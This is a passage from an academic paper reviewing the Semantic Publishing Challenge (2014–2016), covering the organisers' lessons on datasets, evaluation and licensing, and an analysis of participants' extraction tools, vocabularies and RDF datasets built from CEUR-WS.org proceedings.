from the community can be turned into an incentive to participate. Community traction Lesson. Although the challenge was open to everyone from industry and academia, we originally expected participants from the Semantic Web community. However, the submitted solutions include participants with completely different research focus areas, even without any Semantic Web background. This changed our perception of the core communities in the challenge. In future, one might therefore consider defining a cross- domain task, e.g., using a dataset of publications from the biomedical domain. Validation. Evaluating the scientific profiles of participants and the submitted solutions highlights the diversity of professions. The participants of Task 2 are mainly active researchers in the fields of NLP (Natural Language Processing), Text Mining, and Information Retrieval. Submissions to Task 1 are mostly from the Linked Data and semantic publishing communities, addressing various subjects of interest such as User Modeling, Library Science, and Artificial Intelligence. This diversity of professions was acknowledged while inviting the members of the challenge’s program committee, and during the process of assigning them as reviewers to submissions. Best practice. Defining independent tasks and using datasets related to other fields of study can build a bridge across disciplines. The use case dataset contains data about computer science publications, and the super-event of the Semantic Publishing Challenge series, the ESWC conference, is highly ranked, and thus of potential interest to a wide audience, but focused on a dedicated sub-field of computer science. This choice of subject potentially restricts the target audience and the publicity of the challenge; however, with a slight shift of any of these, it becomes possible to involve other research communities. Lessons learned from building training and evaluation datasets The training and output dataset definition are also crucial parts when organizing a challenge. In the Semantic Publishing Challenge case, we experimented with (i) maintaining the same Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 25/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 training and output dataset, as well as the same tasks, as in the case of Task 1, and (ii) modifying the dataset but keeping almost the same tasks, as in the case of Task 2 and 3. This way, we bridged the gap between building up initial datasets and exploring possibilities for innovative semantic publishing. As mentioned in ‘Semantic Publishing Challenge: 2014–2016’ section, we refined both the datasets and their corresponding tasks over the years according to the participants’ and organizers’ feedback. Dataset continuity Lesson. We noticed benefits of not only continuing the same tasks but also using the same datasets across multiple editions of the challenge. In Task 1 of each edition, we evolved training and evaluation datasets based on the same data source over the three years. Participants were able to reuse their existing tools and extend the previously-created knowledge-bases with limited effort. However, for the other tasks, whose datasets were not equally stable, we had to rebuild the competition every year without being able to exploit the past experience. Once solutions were submitted for Task 2 though and it was repeated with the same dataset in 2016 as in 2015, the Semantic Publishing Challenge immediately gained corresponding profit as for Task 1, as the majority of the submitted solutions were resubmitted. This did not happen with Task 3, which did not gain traction in the first place and changing the training dataset and tasks did not attract submissions. Therefore, the ‘‘continuity’’ lesson is equally applicable to tasks as well as to datasets. Validation. Dataset continuity is not as persistent as task continuity for most challenges, but it still occurs. To be more precise, most challenges in principle reuse the same datasets across different editions: two of the four Semantic Web Evaluation Challenges with multiple editions reused the same dataset, while the other two did the same except for one of their editions, where a different dataset was considered, albeit one of the same nature. Best practice. Same datasets should be continuously reused over the course of different editions. Nevertheless, eventually substituting them by another dataset of the same nature, where the same tasks and tools are equally applicable, does not harm the challenge. Single dataset for all tasks Lesson. Similarly, we observed that it is valuable to use the same dataset for multiple tasks. For instance, in the Semantic Web Challenge case, completely different datasets were used for Task 1 and 2 for the first edition, but complementary datasets were used for the same tasks during the second and third edition, while Task 3 considered the previous year’s output of Task 1. The participants can extend their existing tools to compete for different tasks, with limited effort. This also opens new perspectives for future collaboration: participants’ work could be extended and integrated in a shared effort for producing useful data. It is also worth highlighting the importance of such uniformity for the organizers. It reduces the time needed to prepare and validate data, as well as the risk of errors and imperfections. Last but not least, it enables designing interconnected tasks and producing richer output. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 26/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Validation. All four Semantic Web Evaluation Challenges with multiple editions used the same dataset or subsets of it for all different tasks of the challenge. Best practice. It is clearly beneficial for the challenge to consider the same dataset for all tasks. Exhaustive output dataset description Lesson. An aspect that was underestimated in the first editions of the Semantic Publishing Challenge was the training and output dataset description. While we completely listed all data sources, we did not provide enough information on the expected output: we went into details for the most relevant and critical examples, but we did not provide the exact expected output for all cases in the training dataset. Such information should have been provided, as it directly impacts the quality of the submissions and helps participants to refine their tools. Validation. According to the survey results, the other Semantic Web Evaluation Challenges seem to share the same principle about the exhaustive description of the expected output dataset. To be more precise, only one of the Semantic Web Evaluation Challenges does not provide a detailed and exhaustive description of the expected output. Best practice. Exhaustive and detailed description of both the training and evaluation dataset is required, as it affects the submissions’ quality and helps participants to refine their tools. Lessons learned from evaluating results All three editions of the Semantic Publishing Challenge shared the same evaluation procedure (see ‘Tasks evaluation’ for details). However, it presented some weaknesses, especially in the first two editions, which we subsequently addressed. Three lessons are derived from the issues that are explained below. Entire dataset evaluation Lesson. Even though we asked participants to run their tools on the entire evaluation dataset, we considered only a subset for the final evaluation. The subset has been randomly selected from clusters representing different cases, which participants were required to address. On the one hand, since the subset was representative of these cases, we received a fair indication of each tool capabilities. On the other hand, some submissions were penalized as their tool could have worked well on other values, which were not taken into account for the evaluation. In the second edition, we tried to resolve this issue by increasing the number of evaluation queries, without reaching the desired results though, but causing instead some additional overhead to the participants. In the third edition, we reduced the number of evaluation queries, but we radically increased their coverage to assure that the greatest part of the dataset (or even the whole dataset) is covered. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 27/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Validation. Our lesson learned was validated by our survey in this case too. Only one of the Semantic Web Evaluation Challenges does not take into consideration the entire dataset for the evaluation. Best practice. The evaluation method should cover the entire evaluation dataset to be fair, to avoid bias and to reinforce submissions to maintain a high quality across the entire dataset. Disjoint training and evaluation dataset Lesson. During the first two editions of the Semantic Publishing Challenge, the evaluation dataset was a superset of the training one. This may have resulted in some over-training of the tools, and caused imbalance in the evaluation, as certain tools performed very well for the training dataset but not for the entire dataset. In an effort to avoid this, we made the training and evaluation datasets disjoint for the third edition of the Semantic Publishing Challenge. It is more appropriate to use completely disjoint datasets, as a solution to avoid over-trained tools. Validation. Our lesson learned regarding disjoint training and evaluation datasets was validated by the other challenge organizers. Only one of the Semantic Web Evaluation Challenges considers an evaluation dataset which is a subset of the training dataset. All the others consider disjoint training and evaluation datasets. Best practice. The training and evaluation dataset should be disjoint to avoid over- trained tools. Available evaluation tool Lesson. The evaluation was totally transparent and all participants received detailed feedback about their scores, together with links to the open source tool used for the final evaluation. However we were able to release the evaluation tool only after the challenge for the last two editions. The evaluation tool was not made available after the 2014 edition, it was only made available after the 2015 edition, while it was made available by the end of the training for the 2016 edition. It is instead more meaningful to make it available during the training phase, as we did for the challenge’s third edition. Participants can then refine their tool and improve the overall quality of their output. Moreover, such an approach reduces the (negative) impact of output imperfections. Though the content under evaluation was normalized and minor differences were not considered as errors, some imperfections were not expected and were not handled in advance. Some participants, for instance, produced CSV files with columns in a different order or with minor differences in the IRI structure. These all could have been avoided if participants had received feedback during the training phase, with the evaluation tool available as a downloadable stand-alone application or as a service. Validation. Our lesson learned regarding the availability of the evaluation tool was also validated by our survey. To be more precise, all the Semantic Web Evaluation Challenges Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 28/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 2The extraction tool’s integration in the CEUR-WS.org production workflow is still in progress but expected to conclude in 2016. make the evaluation tool available to the challenge participants. There is only one that does not, but only because there is no evaluation tool. Best practice. The evaluation tool should be made available to the participants as early as possible while the participants are still working with the training dataset and fine tuning their approaches. Lessons learned from expected output use and synergies In all three editions of the Semantic Publishing Challenge, the potential use of the expected output was clearly stated in the call, but not the output dataset license; it was up to the participants to choose one. Moreover, the challenge was disseminated and supported thanks to synergies with other events. In this section, we outline lessons learned regarding how the expected use of the challenge output and synergies reflect on the challenge perspective, also on the participants and their submissions. Expected output use Lesson. The uppermost goal of the Semantic Publishing Challenge was to obtain the best output dataset. To achieve that, it is required to identify the best performing tool, namely the tool that actually produces the best output dataset. This tool—or a refined version—is subsequently used to generate the RDF representation of the whole CEUR-WS.org corpus2. The fact that the submitted tools are expected to be reused becomes a critical issue: participants’ submission should not only target the challenge, but they should produce an output that is directly reusable. Therefore, it is in fact critical to state how the results of the challenge will be eventually used, in order to encourage and motivate participants. Validation. Three out of the other four Semantic Web Evaluation Challenges do clearly mention the expected output use, as the Semantic Publishing Challenge does too. Best practice. The expected output use and conditions should be explicitly specified in advance. License Lesson. The incentive to organize the Semantic Publishing Challenge was to reuse the output dataset. Thus, having the permission to do so, which is specified through the dataset license, but also to reuse the tool that produces this output to systematically generate the CEUR-WS.org dataset, is of crucial importance. Particular attention should be given to the licensing of the output produced by the participants. We did not explicitly say which license the submitted solutions should have: we just requested from participants to use an open license on data (at least as permissive as the source of data) and we encouraged open-source licenses on the tools (but not mandatory). Most of the participants did not declare which exact license applies to their data. This is an obstacle for its reusability: especially when data come from heterogeneous sources (e.g., paper full texts copyrighted by the individual authors, as well as metadata copyrighted by the workshops’ chairs) and are heterogeneous in content and format, as in the case of CEUR-WS.org, it is very important to provide an explicit representation of the licensing information. Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 29/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 Validation. Like the Semantic Publishing Challenge, none of the other Semantic Web Evaluation Challenges specified the tool or output dataset license. As a result, none of the submitted solutions provided any licensing information, apart from one challenge where some of the submitted solutions provided licensing information. Even though all Semantic Web Evaluation Challenges follow the same practice of not specifying the output dataset potential license, it becomes obvious based on the results that explicitly specifying it is important if the challenge output is desired to be reused. Best practice. The output dataset license should be explicitly requested to be provided for each one of the submitted solutions. Moreover, participants should be advised to re- spectively specify their tools’ licensing information, to enable inference of their potential re- usability. Conflicts and synergies Lesson. Based on our experience from organizing three editions of the Semantic Publishing Challenge, we realized that the dissemination should happen in a targeted way. To this extent, other events thematically relevant to the challenge are considered important synergies that contribute to generating interest and identifying potential participants: For instance, in the Semantic Publishing Challenge case the fact that the SePublica 2014 workshop on semantic publishing was organized at ESWC 2014 reflected positively on our challenge, since we had fruitful discussions with its participants. Moreover, the fact that results from the first two editions of the Semantic Publishing Challenge (Vahdati et al., 2016) were presented at the SAVE-SD workshop on semantics, analytics, visualization and enhancement of scholarly data (SAVE-SD2016 Workshop, http://cs.unibo.it/save-sd/2016/), which was co-located with WWW 2016, contributed to the challenge dissemination’s and in particular to an audience both thematically and technologically relevant to the challenge. To the contrary, in 2015, we introduced a task on interlinking and realized possible conflicts with other challenges, like OAEI (Ontology Alignment Evaluation Initiative), which may have resulted in the lack of participation to Task 3—even though Task 3 did not intend to cover the specialized scope of OAEI, but rather put the interlinking task into the scope of a certain use case that merely served in aligning the tasks’ outputs among each other and with other datasets in the LOD Cloud. Therefore, we concluded that it is important not only to generate interest but also to identify and avoid potential conflicts. Validation. All Semantic Web Evaluation Challenges collaborate with the ESWC conference, as they are co-located with this event. Besides the main conference, which drives the challenges, it appears that most of them, and in particular the most long-standing ones, also collaborate with other events and, in particular, with other workshops. For instance, the QALD challenge collaborates with the CLEF QA track (http://nlp.uned.es/clef-qa/), and the challenge on Semantic Sentiment Analysis collaborates with the workshop on Semantic Sentiment Analysis (http://www.maurodragoni.com/research/opinionmining/events/), which is also co-organized with ESWC. Last, the OKE challenge collaborates with the Linked Data for Information Extraction workshop (LD4IE) (LD4IE2016 Workshop, Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 30/47 https://peerj.com http://cs.unibo.it/save-sd/2016/ http://nlp.uned.es/clef-qa/ http://www.maurodragoni.com/research/opinionmining/events/ http://dx.doi.org/10.7717/peerj-cs.105 http://web.informatik.uni-mannheim.de/ld4ie2016/LD4IE2016/Overview.html) which, in turn, is co-located with ISWC. According to our survey, none of the other challenges experienced conflicts with further challenges. Best practice. Establish synergies with other events that are thematically and/or technologically relevant to reinforce dissemination and to identify potential participants. CHALLENGE SOLUTIONS ANALYSIS In this section, we discuss observations from the participants’ solutions and derive corresponding conclusions that can be used in the Linked Data publishing domain. We group the lessons into four categories: tools, ontologies, data and evaluation process, even though there is some overlap between these aspects. Lessons learned from the tools Valuable indications can be derived by looking at the tools implemented by the participants. In particular, we focus on the software used to address Tasks 1 and 2. Primary analysis Observation. The Semantic Publishing Challenge tasks could be addressed by both generic and ad-hoc solutions, as well as different methodologies and approaches; nevertheless, solutions tend to converge. For Task 1, two out of four solutions primarily consisted of a tool developed specifically for this task, whereas the other two solutions only required task-specific templates or rules to be used within their otherwise generic implementations. In the latter case, Solution 1.2 abstracts the extraction rules from the implementation, whereas Solution 1.4 keeps them inline with the implementation. Those two solutions are generic enough to be adapted even to other domains. Even though solutions were methodologically different, four approaches for dealing with the HTML pages prevailed: (i) structure-based (relying on the HTML code/structure), (ii) layout-based (relying on the Web page layout), (iii) linguistic-based, and (iv) presentation-based. Most tools relied on structured-/layout-based approach (three out of four) and only one on a partially linguistic-based approach (Solution 1.3). As far as Task 2 is concerned, there were different methodologies and approaches combined in different ways. The overall picture is summarized in Tables 9 and 10. The nature of the task influenced the proposed solutions. In fact the task was composed of two subtasks: (i) identifying the structural components of the PDF papers and (ii) processing the extracted text. Thus, some solutions mainly focused on structure-based analysis (five out of eight); others gave more relevance to the linguistic-based analysis (three out of eight) for their primary analysis. Last, up to four used the linguistic-based analysis to complement their primary approach, while two solutions also used formatting styles/rules to increase the quality of their output (style-based analysis). We also observed that most solutions implemented a modular pipeline. In particular, the solutions that followed a structure-based analysis had a workflow with a single pipeline, whereas linguistic-based approaches required parallel or iterative pipelines to address Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 31/47 https://peerj.com http://web.informatik.uni-mannheim.de/ld4ie2016/LD4IE2016/Overview.html http://dx.doi.org/10.7717/peerj-cs.105 different aspects of the solution and to increase performance. It is also worth mentioning that two solutions over eight, one being the 2015 most innovative solution, adopted an iterative approach. One of them iterates over the same analysis multiple times to refine the results (Solution 2.4); the other one (Solution 2.8) adopted a layered approach, in which each iteration adds new information to the previously-produced output. Conclusion. The solutions were methodologically different among each other, and modular and hybrid solutions prevailed compared to case-specific ones. This is important as case- specific solutions do not extend beyond the scope of challenges, but generic ones do. It is interesting to note that both 2015 and 2016 the best solutions for Task 2 relied primarily on structure analysis, whereas the most innovative solutions focused on linguistic analysis. This might indicate that further research on linguistic approaches might bring interesting results for optimizing the output of such tasks. A deep analysis of the structure, in fact, made participants capture more information; on the other hand, these approaches were quite straightforward and less innovative. It is interesting, though, to note here that the best performing tool of 2016 grounded its structured-based approach on a prior linguistic analysis, whereas most solutions grounded their linguistic analysis on a prior structure analysis. Thus, hybrid solutions are obviously required but their execution order should not be taken for granted. It is also worth discussing the recall score of the linguistic-based tools: these tools most probably suffer from noisy text extraction. In fact the three solutions (Solution 2.2, Solution 2.3 and Solution 2.4) that mainly rely on linguistic analysis achieved the lowest recall scores both in 2015 and 2016 editions, even though they showed significant improvement in the latter edition. Similarly, the tool that relied on a linguistic analysis for Task 1 showed significantly lower precision and recall, compared to the other tools, indicating that linguistic-based solutions are not enough, if not supported by a precise structure analysis. Even though the linguistic-based approach was considered a rather innovative way of dealing with Task 1, the evaluation showed that a linguistic-based analysis might not be able to perform as well as a structure-based one. Methodologies: extraction, intermediate format and machine learning Observation. Diverse methodologies were employed by the participants to extract and analyze content. There were no prevalent approaches, but some tendencies were observed. For Task 1, three out of four solutions considered rules to extract data from the HTML pages; two of them considered CSS to define the rules, while the other one, which relied on linguistic-based analysis, considered JAPE; the latter solution was based on crawling. Last, all solutions used regular expressions at some point of their workflow. For Task 2, half of the solutions in 2015 but only two out of five in 2016 extracted the text from PDF documents and turned it into plain text. On the contrary, the majority extracted the text from the PDF files but turned it into XML (two out of six solutions in 2015 and four out of five in 2016). There was only one solution that used HTML as intermediate format. We noted that, both in 2015 and 2016, the best performing solutions relied on Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 32/47 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.105 a PDF-to-XML extraction. Moreover, one solution changed from PDF-to-text to PDF- to-XML and indeed performed better in 2016, but we cannot state with high certainty if this was the determining factor. Besides extraction, as far as text analysis is concerned, five solutions in 2015 and four in 2016 relied on supervised Machine Learning. Only two solutions in 2015 and one in 2016 (the same as in 2015) additionally relied on unsupervised Machine Learning to address Task 2. Last, all solutions employed heuristics and regular expressions. Five out of six solutions in 2015 employed Natural Language Processing (NLP) and Named Entity Recognition (NER), and those that also participated in 2015 kept NLP/NER in their workflows in 2016. Conclusion. Solutions based on supervised Machine Learning were awarded as the most innovative both in 2015 and in 2016. Therefore, it seems that there is potential on experimenting with supervised Machine Learning approaches to address such a task. Nevertheless, even though the best performing solution in 2015 did use supervised Machine Learning, it is not the case for 2016, which makes us conclude that fundamentally alternative solutions might show good results too. Overall, there is potential for improvement and plenty alternative methodologies can be investigated. The intermediate format used by each solution, on the other hand, had no relevant impact on the final results. Source tools Observation. The Semantic Publishing Challenge call did not prescribe (i) the implementation language, (ii) the license, as well as whether the tools should (iii) reuse existing components or external services, and (iv) be open-sourced or not. The participants were allowed to follow their preferred approaches. Three out of four Task 1 solutions, as shown in Table 3, and seven out of eight Task 2 solutions, as shown in Table 11, primarily relied on Java-based implementations. In both cases, the remaining solution relied on Python. Two out of eight solutions for Task 2 complemented their Java-based implementations with Python-based parts. Moreover, as it is observed in Table 3, for Task 1, three out of four solutions relied on tools totally open-sourced, while the fourth one, the one that addressed both Task 1 and Task 2, relied on a stack of tools which are open-sourced, but the workflow used was not. This is also observed in most tools for Task 2, as shown in Table 11 (six out of the eight solutions). MIT (http://opensource.org/licenses/mit-license.html) was the most popular license, with half solutions for Task 1 using it and one out of eight solutions for Task 2, followed by AGPL-3.0 (https://www.gnu.org/licenses/agpl-3.0.en.html), with two out of eight solutions for Task 2 using it. Last, half of the solutions incorporated external services to accomplish the tasks (two out of four for Task 1 and four out of eight for Task 2). The one of the two solutions for Task 1 that used external services was the one that participated both in Task 1 and Task 2. GATE, DBpedia, CrossRef API (http://api.crossref.org/), and FreeCite (http://freecite.library.brown.edu/) are the most used external services. Conclusion. Open-sourced tools prevailed over closed-sourced ones. None of the participants used a totally closed or proprietary software. Most of the them used an Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 33/47 https://peerj.com http://opensource.org/licenses/mit-license.html https://www.gnu.org/licenses/agpl-3.0.en.html http://api.crossref.org/ http://freecite.library.brown.edu/) http://dx.doi.org/10.7717/peerj-cs.105 open license, and Java and Python based implementations prevailed both for Task 1 and Task 2. The integration of external services was also a valuable solution for the participants. Lessons learned from models and ontologies In this section, we discuss the different solutions with respect to the data model, the vocabularies and the way they used them to annotate the data. Data model Observation. All Task 1 solutions tend to converge regarding the data model, identify- ing the same core concepts: Conference, Workshop, Proceedings, Papers, and Person. A few solutions covered more details, for instance, Solution 1.1 identified also the concepts of Invited Papers and Proceedings Chair, while Solution 1.3 captured different types of sessions by identifying additionally the concepts of Session, Keynote Session, Invited Session and Poster Session, as well as the concepts of Organization and Topic. In particular for Task 1, Solution 1.4 domain modeling was inspired by the model used in Solution 1.1, with some simplifications, a practice commonly observed in real Linked Data set modeling. In contrast, Task 2 solutions used more heterogeneous data models. There are six high-level properties identified by all solutions: identifier, type, title, authors, affiliation and country. Other entities were instead described in different ways and with different granularity. That happened, for instance, to the entities organization, funding agency and grant. In certain cases they are identified as separate entities and in other cases their details constitute part of other entities descriptions (and are expressed as data or object properties). The coverage of the data models was also heterogeneous: for the 2016 edition, for instance, not all solutions identify the sections and capture the notion of caption of figures and tables. Conclusion. Based on the aforementioned, we observe a trend of converging in respect to the model the CEUR-WS.org dataset should have according to the submitted solutions. Most solutions converge on the main identified concepts in the data (Conference, Workshop, Proceedings, Paper and Person) and on the CEUR-WS.org dataset’s graph at least for Task 1, namely the publications’ metadata. The way the tasks and their corresponding queries are described contributes towards this direction. Vocabularies Observation. There is a wide range of vocabularies and ontologies that can be used to annotate scholarly data. Most of the solutions preferred to (re)use almost the same existing ontologies and vocabularies, as summarized in Table 4. Six out of twelve solutions for both Task 1 and 2 used the Semantic Web for Research Communities (swrc) vocabulary (SWRC, http://swrc.ontoware.org/ontology#), five used the Bibliographic Ontology (bibo) vocabulary (bibo, http://purl.org/ontology/bibo/) and three used the Semantic Web Conference (swc) vocabulary (SWC, http://data.semanticweb.org/ns/swc/ontology#). Moreover, six solutions used one or more vocabularies of the Semantic Publishing and Referencing Ontologies (SPAR, http://www.sparontologies.net/). In particular, five solutions used the FRBR-aligned Bibliographic Ontology (FaBiO, http://purl.org/spar/ fabio/) ontology, three the Publishing Roles Ontology (PRO, http://purl.org/spar/pro/), Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 34/47 https://peerj.com http://swrc.ontoware.org/ontology# http://purl.org/ontology/bibo/ http://data.semanticweb.org/ns/swc/ontology# http://www.sparontologies.net/ http://purl.org/spar/fabio/ http://purl.org/spar/fabio/ http://purl.org/spar/pro/ http://dx.doi.org/10.7717/peerj-cs.105 three the Document Components Ontology (DoCO, http://purl.org/spar/doco/), two the Bibliographic Reference Ontology (BiRO, http://purl.org/spar/biro/), two the Funding, Research Administration and Projects Ontology (FRAPO, http://purl.org/cerif/frapo/) and one the Functional Requirements for Bibliographic Records (FRBR, http://purl.org/ spar/frbr/). Besides the domain-specific vocabularies and ontologies, eight solutions used the Dublin Core vocabulary (dc, http://purl.org/dc/elements/1.1/ and dcterms, http://purl.org/dc/terms/), eight the Friend of a Friend vocabulary (foaf , http://xmlns.com/ foaf/0.1/), five solutions used the DBpedia ontology (dbo, http://dbpedia.org/ontology/), three the VCard (vcard, http://www.w3.org/2006/vcard/ns#) and two the event (event ontology, http://purl.org/NET/c4dm/event.owl#) and timeline (timeline ontology, http://purl.org/NET/c4dm/timeline.owl#) ontologies and schema.org (http://schema.org). Last, there were four solutions that used their own custom vocabularies, in combination with existing ones in most cases, but only one used barely its custom vocabulary. In contrast to Task 1 solutions, which all converged on using same vocabularies and ontologies intuitively, Task 2 solutions reused a wider range and relatively different vocabularies and ontologies to annotate same entities appearing in the same data, which is extracted from PDF documents. This is a consequence of the rather diverse data models considered by different solutions. Interestingly, most Task 2 solutions use sub-ontologies of the SPAR ontologies family. Last, most solutions reuse the three most popular vocabularies in the education field according to Schmachtenberg, Bizer & Paulheim (2014). The general purpose vocabularies—such as FOAF—used by the participants are also listed high in the same ranking. Conclusion. It is evident that the spirit of vocabulary reuse gains traction. However, it is interesting that different solutions used the same ontologies to annotate the same data differently (see also ‘Annotations’ section). Annotations Observation. Even though all solutions used almost the same vocabularies, not all of them used the same vocabulary terms to annotate the same entities. As far as Task 1 is concerned, all solutions only converged on annotating Persons using the foaf:Person class. For the other main concepts the situation was heterogeneous, as reported in Table 6. A few of them also explicitly annotated Persons using the foaf:Agent class, even though foaf:Person is a subclass of foaf:Agent. foaf:Agent was also used by one of the solutions during the first edition, but it was then replaced by the more explicit foaf:Person. The Conference concept was well-captured by all solutions. It is interesting to note that, for the first edition, most solutions used relatively generic vocabulary terms, e.g., swrc:Event, swc:Event or swc:OrganizedEvent to annotate the data. However, in the second edition, most solutions preferred to use more explicit vocabulary terms for the same concept, e.g., swrc:Conference and bibo:Conference, while they also maintained the more generic vocabulary terms for events. The same occurred with the Paper concept. The 2014 edition datasets were annotated using more generic vocabulary terms, e.g., swrc:Publication or even foaf:Document, whereas in Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 35/47 https://peerj.com http://purl.org/spar/doco/ http://purl.org/spar/biro/ http://purl.org/cerif/frapo/ http://purl.org/spar/frbr/ http://purl.org/spar/frbr/ http://purl.org/dc/elements/1.1/ http://purl.org/dc/terms/ http://xmlns.com/foaf/0.1/ http://xmlns.com/foaf/0.1/ http://dbpedia.org/ontology/ http://www.w3.org/2006/vcard/ns# http://purl.org/NET/c4dm/event.owl# http://purl.org/NET/c4dm/timeline.owl# http://schema.org http://dx.doi.org/10.7717/peerj-cs.105 2015 more explicit terms were preferred, such as swrc:InProceedings or bibo:Article. In particular swrc:InProceedings was adopted by three out of four solutions. In contrast to Task 1 solutions, which focus on identifying and describing concrete entities, Task 2 solutions mainly focus on capturing their properties. This is also evident from the fact that Task 2 solutions rarely provide the entities’ types, whereas Task 1 solutions always do, even though this information could be inferred from the properties used. Moreover, Task 2 solutions generate much fewer entities than Task 1 solutions. All Task 2 solutions use approximately the same number of properties. It is interesting though to note that solutions that follow in principle the linguistic approach tend to use more predicates, which are more explicit and more descriptive too. All solutions have approximately the same number of predicates, but their precision is still not accurate. Only one of Task 2 solutions (Solution 2.7) has a significantly higher number of predicates compared to the other solutions. This occurs because different URIs are used for the same relationships appearing in different files to annotate the data. For instance, the section-title property appears with 37 different URIs, such as the following: http://ceur-ws.org/Vol-1558/paper5#section-title, or http://ceur-ws.org/Vol-1303/paper_4#section-title. However, such a choice prevents easily identifying same relationships. DCMI is the vocabulary most frequently used by all solutions for annotating the identifier and the title. RDF(S) is also used for the title (represented as rdfs:label), as well as for the entities’ types. For the remaining properties, a wide range of different vocabularies are considered, but they do not converge on their choices. Indicatively: one of the solutions considers schema:mentions to describe a citation, whereas other solutions consider bibo:cites or biro:references. In the same context, some solutions associate authors to papers with the dcterms:creator property, whereas others consider foaf:maker. Moreover, some solutions indicate the affiliation using the swrc:affiliation property, whereas others use pro:relatesToOrganization, or some solutions represent the publication year using swrc:year, whereas others use fabio:hasPublicationYear. Last, it is interesting to note that solutions may even use vocabulary terms that do not exist, such as swrc:Section. Conclusion. On the one hand, the more familiar the data publishers get with the data, the more explicit they become with the annotations they use and the more they converge on the choices they make. On the other hand, the way different solutions extract particular properties reflects on the final data model. Lessons learned from submitted RDF datasets In this section, we discuss the different solutions with respect to the RDF dataset they produce. Successive submissions improvements Observation. From the first edition to the second edition of the Semantic Publishing Challenge, we noticed that the participants who re-submitted their solutions had improved the overall dataset, not only the parts useful to answer the queries. For Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 36/47 https://peerj.com http://ceur-ws.org/Vol-1558/paper5#section-title http://ceur-ws.org/Vol-1303/paper_4#section-title http://dx.doi.org/10.7717/peerj-cs.105 instance, all three solutions of Task 1 that had participated in both the 2014 and the 2015 editions modified the way they represented their data, and this resulted in corresponding improvements to the overall dataset. Indicatively, as far as Task 1 is concerned, Solution 1.2 addressed a number of shortcom- ings the previous tool’s version had, in particular regarding data transformations, which might have influenced their precision improvement. Heyvaert et al. (2015) also assessed their mappings’ quality to verify the schema is valid with respect to the used vocabularies and ontologies. To address the same issue and avoid inconsistencies in their dataset, Solution 1.1 preferred to align different ontologies’ classes and properties, e.g., aligning BIBO to the SWRC ontologies, as SWC already has some dependencies on SWRC. As far as Task 2 is concerned, some parts of Solution 2.2, for instance, were changed for participating in the 2016 edition. The authors employed different processing steps of their tool, which were not used in the previous edition, e.g., processing section headings, hierarchy and captions, but they also introduced novel aspects driven by the challenge tasks and queries, e.g., extracting links from supplementary material. Among the changes of Solution 2.4, it was the PDF extraction tool used, whose change might have partially contributed to their recall improvement, while a number of additional or new conditional heuristics most probably led to their precision improvement. Overall, it was observed that improvements to extraction might reflect on the solutions’ recall, whereas improvements to text analysis on their precision. Conclusion. The improvement of the dataset was evident on some aspects and indeed the results were satisfying, but we still see room for improvement. It is interesting though to note that solutions did not remain focused on improving just the data extraction parts of the challenge, but also the data modeling, even though the latter is not directly assessed by the challenge. Dataset structure Observation. The different solutions differ significantly with respect to the size of the produced dataset. This happens for different reasons. Solution 1.1 shows an extraordinary number of triples compared to other solutions. This occurs to a certain extent because each concept is annotated with at least two classes, making one fourth of the dataset to be type declarations. Moreover, they include even annotations that indicate the type of the resource or property on a very low level, namely they use rdfs:Class, rdfs:Property, as well as owl:ObjectProperty or owl:AnnotationProperty etc., which counts for almost 2,000 triples of the total dataset. Solution 1.4 also shows a high number of triples. This occurs because the same dataset contains triples describing the structure of the HTML page, as well as triples describing the actual content of the pages. Nevertheless, the main reason that causes the flow of triples is the fact that a new URI is generated each time a concept appears in one of the CEUR-WS.org volumes. For instance, the person Ruben Verborgh appears to have 9 URIs, e.g., http://ceur-ws.org/Vol-1034/#RubeniVerborgh for the Vol-1034 proceedings or http://ceur-ws.org/Vol-1184/#RubeniVerborgh for the Vol- 1184 proceedings. The person Christoph Lange appears to have 15 distinct URIs, e.g., for Dimou et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.105 37/47 https://peerj.com http://ceur-ws.org/Vol-1034/#RubeniVerborgh http://ceur-ws.org/Vol-1184/#RubeniVerborgh http://dx.doi.org/10.7717/peerj-cs.105 3The definition of Task 1 was not explicit with regard to whether different persons with the same name (within or across different workshops proceedings volumes) should be assumed to be the same person or not. Our current work towards the release of a consolidated CEUR-WS.org dataset shows that the far majority of same names refers to the same person, which is plausible as CEUR-WS.org focuses on the relatively small computer science community. However, a general solution would be wrong to simply assume that same names mean same persons, whereas a full disambiguation of names would require a lot of information to be taken into account beyond the proceedings’ tables of content: the title pages of the PDF papers plus possibly external resources. 4Our instructions did not prescribe whether or not participants should assume persons with the same name to be the same. In the reality of the CEUR-WS.org data, there are very few cases in which the same name refers to two different persons, as the data covers the relatively small domain of computer science researchers. Vol-360 proceedings, the http://ceur-ws.org/Vol-360/#ChristophiLange, or for Vol-1184 proceedings, the http://ceur-ws.org/Vol-1184/#ChristophiLange3 . Solutions 1.2 and 1.3 are approximately at the same number of triples both for the 2014 and the 2015 editions. Conclusion. There is a very high heterogeneity in the produced datasets; although solutions tend to agree on used vocabularies, their design choices are very different and, as a consequence, the number and organization of the triples is very heterogeneous. Coverage Observation. We further noticed that solutions rarely agree upon the extracted information. For instance, some skip the extraction of wrong data or certain other information. Overall, we observed significant differences with respect to the number of identified entities per category. The results for Task 1 are summarized in Tables 7 and 6, while the results for Task 2 are summarized in Table 8. Produced datasets were very heterogeneous in term of size, number of triples and entities. As far as Task 1 is concerned, apparently, Solution 1.1 and Solution 